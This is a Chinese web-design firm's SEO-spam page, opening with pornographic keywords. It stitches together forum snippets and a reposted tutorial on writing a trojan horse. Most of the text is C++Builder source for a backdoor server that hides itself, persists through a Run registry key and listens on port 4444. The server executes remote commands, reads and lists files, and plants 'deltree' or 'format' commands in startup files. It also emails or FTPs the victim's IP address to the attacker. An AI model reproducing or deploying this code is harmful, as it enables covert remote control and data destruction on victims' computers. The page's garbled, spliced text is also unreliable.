真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

vb點(diǎn)虐 木馬編寫 木馬程序編寫

VB.NET下如何進(jìn)行遠(yuǎn)程線程注入

首先來了解遠(yuǎn)程線程注入遠(yuǎn)程線程插入(注入)技術(shù)指的是通過在另一個進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入目標(biāo)進(jìn)程的內(nèi)存地址空間。將木馬程序以DLL的形式實(shí)現(xiàn)后,需要使用插入到目標(biāo)進(jìn)程中的遠(yuǎn)程線程將該木馬DLL插入到目標(biāo)進(jìn)程的地址空間,即利用該線程通過調(diào)用Windows API LoadLibrary函數(shù)來加載木馬DLL,從而實(shí)現(xiàn)木馬對系統(tǒng)的侵害。 這種技術(shù)一般用于外掛 當(dāng)外掛注入到游戲中時 你的電腦也就中啦木馬 一般的解決方法 wmiprvse.exe是一個系統(tǒng)服務(wù)的進(jìn)程,你可以結(jié)束任務(wù),進(jìn)程自然消失。 禁用Windows Management Instrumentation Driver Extensions服務(wù)或者改為手動 具體:桌面-我的電腦-管理-服務(wù)和應(yīng)用程序-服務(wù) 里面有個Windows Management Instrumentation 右鍵—禁用就可以了. 我也用過,感覺第二種方法較好。 解除命令方法:同樣操作復(fù)制下邊的命[1][2][3]令粘貼輸入,回車確定。即可、 reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmiprvse.exe” /f希望會幫到你

專業(yè)成都網(wǎng)站建設(shè)公司,做排名好的好網(wǎng)站,排在同行前面,為您帶來客戶和效益!創(chuàng)新互聯(lián)建站為您提供成都網(wǎng)站建設(shè),五站合一網(wǎng)站設(shè)計制作,服務(wù)好的網(wǎng)站設(shè)計公司,成都做網(wǎng)站、成都網(wǎng)站制作、成都外貿(mào)網(wǎng)站建設(shè)負(fù)責(zé)任的成都網(wǎng)站制作公司!

用VB.NET編寫的軟件的科學(xué)性與先進(jìn)性?

這個題目官僚味道十足,專門寫給領(lǐng)導(dǎo)看的吧……

從大的方面來說,語言是次要的,要達(dá)到某種功能可以用很多種語言來實(shí)現(xiàn)。

從小的方面來說,VB(包括點(diǎn)虐 )有其優(yōu)點(diǎn)(上手快,出東西快等),缺點(diǎn)也很明顯(控制不到底層等)。談不上什么先進(jìn)性。

另外,你的語法似乎也有問題。你是說用VB.NET寫出來的軟件嗎?那花樣多了去了,寫個木馬病毒什么的絕對不成問題。

如何編寫木馬

木馬是如何編寫的(一)

特洛依木馬這個名詞大家應(yīng)該不陌生,自從98年“死牛崇拜”黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷,使在Dos??Windows時代中長大的中國網(wǎng)民從五彩繽紛的網(wǎng)絡(luò)之夢中驚醒,終于認(rèn)識到的網(wǎng)絡(luò)也有它邪惡的一面,一時間人心惶惶。

我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網(wǎng),到處求救!呵呵,要知道,木馬(Trojan)的歷史是很悠久的:早在ATT Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機(jī)的口令,以取得更高的權(quán)限。那時木馬的主要方法是誘騙??先修改你的.profile文件,植入木馬;當(dāng)你登陸時將你敲入的口令字符存入一個文件,用Email的形式發(fā)到攻擊者的郵箱里。國內(nèi)的年輕人大都是在盜版Dos的熏陶下長大的,對網(wǎng)絡(luò)可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網(wǎng)絡(luò)事業(yè)的發(fā)展的時候,BO這個用三年后的眼光看起來有點(diǎn)簡單甚至可以說是簡陋的木馬(甚至在Win9x的“關(guān)閉程序”對話框可以看到進(jìn)程)給了當(dāng)時中國人極大的震撼,它在中國的網(wǎng)絡(luò)安全方面可以說是一個劃時代的軟件。

自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成??服務(wù)器程序(Server)和客戶端程序(Client),服務(wù)器負(fù)責(zé)打開攻擊的道路,就像一個內(nèi)奸特務(wù);客戶端負(fù)責(zé)攻擊目標(biāo),兩者需要一定的網(wǎng)絡(luò)協(xié)議來進(jìn)行通訊(一般是TCP/IP協(xié)議)。為了讓大家更好的了解木馬攻擊技術(shù),破除木馬的神秘感,我就來粗略講一講編寫木馬的技術(shù)并順便編寫一個例子木馬,使大家能更好地防范和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發(fā)工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設(shè)計太復(fù)雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如“死牛崇拜”黑客小組公布的BO2000源代碼,是VC編寫的,網(wǎng)上俯拾皆是);VB嘛,談都不談??難道你還給受害者傳一個1兆多的動態(tài)鏈接庫??Msvbvm60.dll嗎?

啟動C++Builder 5.0企業(yè)版,新建一個工程,添加三個VCL控件:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個服務(wù)器程序,可以對外服務(wù)(對攻擊者敞開大門)。Socket最初是在Unix上出現(xiàn)的,后來微軟將它引入了Windows中(包括Win98和WinNt);后兩個控件的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協(xié)議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協(xié)議)功能,大家一看都知道是使軟件具有上傳下載功能和發(fā)郵件功能的控件。

Form窗體是可視的,這當(dāng)然是不可思議的。不光占去了大量的空間(光一個Form就有300K之大),而且使軟件可見,根本沒什么作用。因此實(shí)際寫木馬時可以用一些技巧使程序不包含F(xiàn)orm,就像Delphi用過程實(shí)現(xiàn)的小程序一般只有17K左右那樣。

我們首先應(yīng)該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的“關(guān)閉程序”對話框中隱藏的代碼。這看起來很神秘,其實(shí)說穿了不過是一種被稱之為Service的后臺進(jìn)程,它可以運(yùn)行在較高的優(yōu)先級下,可以說是非??拷到y(tǒng)核心的設(shè)備驅(qū)動程序中的那一種。因此,只要將我們的程序在進(jìn)程數(shù)據(jù)庫中用RegisterServiceProcess()函數(shù)注冊成服務(wù)進(jìn)程(Service Process)就可以了。不過該函數(shù)的聲明在Borland預(yù)先打包的頭文件中沒有,那么我們只好自己來聲明這個位于KERNEL32.DLL中的鳥函數(shù)了。

首先判斷目標(biāo)機(jī)的操作系統(tǒng)是Win9x還是WinNt:

{

DWORD dwVersion = GetVersion();

// 得到操作系統(tǒng)的版本號

if (dwVersion = 0x80000000)

// 操作系統(tǒng)是Win9x,不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定義RegisterServiceProcess()函數(shù)的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加載RegisterServiceProcess()函數(shù)所在的動態(tài)鏈接庫KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函數(shù)的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://執(zhí)行RegisterServiceProcess()函數(shù),隱藏本進(jìn)程

FreeLibrary(hDLL);

file://卸載動態(tài)鏈接庫

}

}

這樣就終于可以隱身了(害我敲了這么多代碼?。?。為什么要判斷操作系統(tǒng)呢?因?yàn)閃inNt中的進(jìn)程管理器可以對當(dāng)前進(jìn)程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到后面再講)。接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,并修改注冊表,以便啟動時自動加載:

{

char TempPath[MAX_PATH];

file://定義一個變量

GetSystemDirectory(TempPath ,MAX_PATH);

是system目錄緩沖區(qū)的地址,MAX_PATH是緩沖區(qū)的大小,得到目標(biāo)機(jī)的System目錄路徑

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串,使之成為能供編譯器使用的樣式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://將自己拷貝到%System%目錄下,并改名為Tapi32.exe,偽裝起來

Registry=new TRegistry;

file://定義一個TRegistry對象,準(zhǔn)備修改注冊表,這一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

file://設(shè)置主鍵為HKEY_LOCAL_MACHINE

Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創(chuàng)建之

try

{

file://如果以下語句發(fā)生異常,跳至catch,以避免程序崩潰

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字樣的鍵值,并且是否為拷貝的目錄%System%+Tapi32.exe

file://如果不是,就寫入以上鍵值和內(nèi)容

}

catch(...)

{

file://如果有錯誤,什么也不做

}

}

好,F(xiàn)ormCreate過程完成了,這樣每次啟動都可以自動加載Tapi32.exe,并且在“關(guān)閉程序”對話框中看不見本進(jìn)程了,木馬的雛形初現(xiàn)。

接著選中ServerSocket控件,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定端口,處于服務(wù)器工作狀態(tài)。再將Port填入4444,這是木馬的端口號,當(dāng)然你也可以用別的。但是你要注意不要用1024以下的低端端口,因?yàn)檫@樣不但可能會與基本網(wǎng)絡(luò)協(xié)議使用的端口相沖突,而且很容易被發(fā)覺,因此盡量使用1024以上的高端端口(不過也有這樣一種技術(shù),它故意使用特定端口,因?yàn)槿绻饹_突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控件使用的端口,是21號端口,這是FTP協(xié)議的專用控制端口(FTP Control Port);同理TNMSMTP的25號端口也是SMTP協(xié)議的專用端口。

再選中ServerSocket控件,點(diǎn)擊Events頁,雙擊OnClientRead事件,敲入以下代碼:

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定義了一堆待會兒要用到的變量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一個文本文件Win369.bat,作為臨時文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客戶端(攻擊者,也就是你自己)傳來的數(shù)據(jù)

}

好,大門敞開了!接著就是修改目標(biāo)機(jī)的各種配置了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧:

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9個字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的長度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://將第11個字符轉(zhuǎn)換成integer型,存入file_name變量

file://為什么要取第11個字符,因?yàn)榈?0個字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串將被作為寫入的內(nèi)容寫入目標(biāo)文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://將兩個目標(biāo)文件的屬性改為可讀可寫

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11個字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11個字符是1,就把Config.sys格式化

times_of_try=0;

file://定義計數(shù)器

while(fp==NULL)

{

file://如果指針是空

fp=fopen(filename,"a+");

file://如果文件不存在,創(chuàng)建之;如果存在,準(zhǔn)備在其后添加

file://如果出錯,文件指針為空,這樣就會重復(fù)

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了,仍未成功

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://跳至END處

}

}

fwrite(content,sizeof(char),strlen(content),fp);

file://寫入添加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!

fclose(fp);

file://寫完后關(guān)閉目標(biāo)文件

Socket-SendText("Sucess");

file://然后發(fā)回“Success”的成功信息

}

}

上回我們講到如何修改目標(biāo)機(jī)上的啟動配置文件,這回我們就來查看目標(biāo)機(jī)上的目錄樹和文件吧,這在客戶端上使用“dir”命令,跟著敲?:

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3個字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的長度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://從字符串第六個字符開始,將后面的字符存入Dir_Name變量,這是目錄名

if(Dir_Name=="")

{

file://如果目錄名為空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打開目錄出錯

Socket-SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指針是NULL

fp=fopen(TempFile,"w+");

file://就創(chuàng)建system\Win369.bat準(zhǔn)備讀和寫;如果此文件已存在,則會被覆蓋

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了,仍未成功(真有耐心?。?/p>

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://并跳到END處

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果訪問目標(biāo)目錄成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一個字符不是“\”,證明不是根目錄

filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

file://加上“\”字符后將指針指向目錄流

else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目錄,則不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目標(biāo)文件的訪問屬性

if (attrib FA_RDONLY)

file://“”字符是比較前后兩個變量,如果相同返回1,否則返回0

fwrite(" R",sizeof(char),3,fp);

file://將目標(biāo)文件屬性設(shè)為只讀

else

fwrite(" ",sizeof(char),3,fp);

file://失敗則寫入空格

if (attrib FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為隱藏

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為系統(tǒng)

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為普通

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_DIREC)

fwrite(" DIR ",sizeof(char),9,fp);

file://將目標(biāo)文件屬性設(shè)為目錄

else

fwrite(" ",sizeof(char),9,fp);

file://失敗則寫入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

file://將目錄名寫入目標(biāo)文件

fwrite(CR_LF,1,1,fp);

file://寫入換行

}

fclose(fp);

file://關(guān)閉文件

closedir(dir);

file://關(guān)閉目錄

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打開Win369.bat準(zhǔn)備讀

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了,仍未成功

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://并跳到END處

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定義的一個空數(shù)組

Read_Num=fread(temp_content,1,300,fp1);

file://從目標(biāo)文件中讀入前300個字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

變量加上剛才的300個字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重復(fù)

};

Return_Text=Return_Text+temp_content;

變量加上剛才的300個字符

fclose(fp1);

file://關(guān)閉目標(biāo)文件

Socket-SendText(Return_Text);

file://返回Return_Text變量的內(nèi)容

}

}

夠長吧?!察看目錄樹這么費(fèi)勁?。?!你后面可以用BCB中的各種列表框?qū)lient.exe好好美化美化。接下來就是查看指定文件的內(nèi)容了,Client將使用“type”命令,(手指累不累???):

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4個字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://將目標(biāo)文件流存入File_Name變量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打開目標(biāo)文件準(zhǔn)備讀

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已試了100次了

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的錯誤信息

goto END;

file://跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定義一個空數(shù)組

Read_Num=fread(temp_content,1,300,fp);

file://從目標(biāo)文件中讀入前300個字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

的內(nèi)容加上剛才的字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重復(fù)

};

Return_Text=Return_Text+temp_content;

的內(nèi)容加上剛才的字符

fclose(fp);

file://關(guān)閉目標(biāo)文件

Socket-SendText(Return_Text);

file://返回Return_Text的內(nèi)容,即你查看文件的內(nèi)容

}

}

咳咳!累死了!還是來點(diǎn)輕松的吧??操縱目標(biāo)機(jī)的光驅(qū)(注意:mciSendString()函數(shù)的聲明在mmsystem.h頭文件中):

{

else if(temp=="open")

{

file://如果收到的temp的內(nèi)容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就彈出光驅(qū)的托盤

}

else if(temp=="close")

{

file://如果收到的temp的內(nèi)容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驅(qū)的托盤。當(dāng)然你也可以搞個死循環(huán),讓他的光驅(qū)好好活動活動!^_^

}

}

接著就是交換目標(biāo)機(jī)的鼠標(biāo)左右鍵,代碼如下:

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交換鼠標(biāo)左右鍵,簡單吧?

}

}

然后就是使目標(biāo)機(jī)重新啟動。但這里要區(qū)分WinNt和Win9x??NT非常注重系統(tǒng)每個進(jìn)程的權(quán)利,一個普通的進(jìn)程是不應(yīng)具備有調(diào)用系統(tǒng)的權(quán)利的,因此我們要賦予本程序足夠的權(quán)限:

{

else if(temp=="reboot")

{

file://如果收到的temp的內(nèi)容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系統(tǒng)的版本號

if (dwVersion 0x80000000)

{

file://操作系統(tǒng)是WinNt,不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定義變量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

這個函數(shù)的作用是打開一個進(jìn)程的訪問令牌

函數(shù)的作用是得到本進(jìn)程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

的作用是修改進(jìn)程的權(quán)限

tkp.PrivilegeCount = 1;

file://賦給本進(jìn)程特權(quán)

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

的作用是通知Windows NT修改本進(jìn)程的權(quán)利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://強(qiáng)行退出WinNt并重啟

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://強(qiáng)行退出Win9x并重啟

}

}

如果以上都不是,就讓它在Dos窗口中執(zhí)行傳來的命令:

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://創(chuàng)建Win369.bat,如果已存在就覆蓋

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://寫入欲執(zhí)行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://寫入換行符

fclose(fp);

file://關(guān)閉Win369.bat

system(TempFile);

file://執(zhí)行Win369.bat

Socket-SendText("Success");

file://返回“Success”信息

}

}

你可以直接執(zhí)行什么Ping和Tracert之類的命令來進(jìn)一步刺探目標(biāo)機(jī)的網(wǎng)絡(luò)狀況(判斷是否是一個企業(yè)的局域網(wǎng)),然后可以進(jìn)一步攻擊,比如Deltree和Format命令。^_^

到此,服務(wù)器程序的功能已全部完成,但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友,別走開?。ㄎ赐甏m(xù))

木馬是如何編寫的(三)

武漢 周侃

上次已編寫完服務(wù)器端的各種功能,但還差容錯部分還未完成,下面我們Go on! 其代碼如下(照敲不誤 ^_^):

{

END:;

Socket-Close();

file://關(guān)閉服務(wù)

ServerSocket1-Active =true;

file://再次打開服務(wù)

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

file://如果SMTP服務(wù)器已連接則斷開

NMSMTP1-Host = "smtp.163點(diǎn)虐 ";

file://選一個好用的SMTP服務(wù)器,如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

try

{

NMSMTP1-Connect();

file://再次連接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848點(diǎn)虐 ";

file://將信發(fā)到我的郵箱,這一步很關(guān)鍵

NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

file://信的內(nèi)容提示你“服務(wù)器正在運(yùn)行”,并且告訴你受害者的目前的IP地址,以便連接

NMSMTP1-PostMessage-Subject = "Server Running Now!";

file://信的主題

NMSMTP1-SendMail();

file://發(fā)送!

return;

file://返回

NextTime:

NMFTP1-Host = "";

file://你的FTP服務(wù)器的地址

NMFTP1-UserID = "";

file://你的用戶ID

NMFTP1-Port = 21;

端口號,一般為21

NMFTP1-Password = "";

file://你的FTP的密碼

if(NMFTP1-Connected) NMFTP1-Disconnect();

file://如果已連接就斷開

try

{

NMFTP1-Connect();

file://再連接

}

catch(...)

{

return;

file://返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1-RemoteIP;

file://受害者的IP地址

FILE * Upload;

Upload = fopen(NMFTP1-RemoteIP.c_str(),"w+");

file://創(chuàng)建一個新文件準(zhǔn)備寫,如果已存在就覆蓋

fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);

file://寫入以上的SendToSite的內(nèi)容

fclose(Upload);

file://寫完后關(guān)閉此文件

NMFTP1-RemoveDir("public_html");

file://刪除public_html目錄

NMFTP1-Upload(NMFTP1-RemoteIP, NMFTP1-RemoteIP);

file://上傳!

}

啊,超長的OnClientRead事件終于寫完了。最后別忘了要在此服務(wù)器源碼文件中添加以下頭文件:

#include stdlib.h

#include dirent.h

#include fcntl.h

#include dos.h

#include sys\stat.h

#include winbase.h

#include stdio.h

#include process.h

#include io.h

#include mmsystem.h

至此,服務(wù)器端(Server)程序


本文名稱:vb點(diǎn)虐 木馬編寫 木馬程序編寫
分享鏈接:http://weahome.cn/article/ddshijo.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部